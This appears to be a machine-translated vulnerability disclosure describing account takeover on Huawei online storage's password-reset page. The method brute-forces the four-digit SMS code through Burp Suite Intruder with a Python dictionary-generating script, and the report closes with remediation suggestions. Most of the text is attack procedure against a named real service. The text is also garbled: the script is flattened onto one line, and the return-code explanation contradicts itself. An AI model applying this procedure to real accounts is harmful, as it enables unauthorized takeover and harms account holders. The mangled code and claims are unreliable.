Password modification for some users of Huawei online storage

Some users of Huawei online storage can modify their passwords for users bound with mobile phone numbers (users can bind mobile phones in their settings after registration). This attack does not need to know the target mobile phone number, you only need to know the user name (usually the mailbox or mobile phone number. Http://dbank.vmall.com/netdisk/resetpassword.html? V = 2.9.41372210600917 # The inputAccount web page is used to retrieve the password. Enter the target user name and select the r parameter in the "Reset Password through password protection mobile phone" Burpsuite to intercept the data packet GET request as the verification code, set it as a variable. The mobile phone verification code is known to be a combination of four digits. Write a python script to generate a dictionary.

f=open("dict.txt",'w+')chars=['0','1','2','3','4','5','6','7','8','9',# 'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z',# 'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z',]base=len(chars) #62end=len(chars)**4for i in range(0,end):n=ich0=chars[n%base]n=n/basech1=chars[n%base]n=n/basech2=chars[n%base]n=n/basech3=chars[n%base]print i,ch3,ch2,ch1,ch0f.write(ch3+ch2+ch1+ch0+'\n')f.close()

 

Enable intruder. There are 10000 requests, which can be handled in a few minutes. Note that the length of the returned message remains unchanged. Only the retcode is changed. If the password fails to be modified, 0002 is returned. If the password fails to be modified, 0000 is returned. This does not affect our attack. Then log on with the new password. (If the local host is not responded by Huawei online storage, please wait for a minute or two or change your computer) Solution:This password retrieval logic facilitates users, but has security risks. Suggestion: 1. the verification code is longer. Generally, there are 6 Verification codes. 2. after you enter the correct Verification Code, the new password page is displayed. The verification code is valid only once. restrict the number of times a user submits a verification request or enter an incorrect image verification code.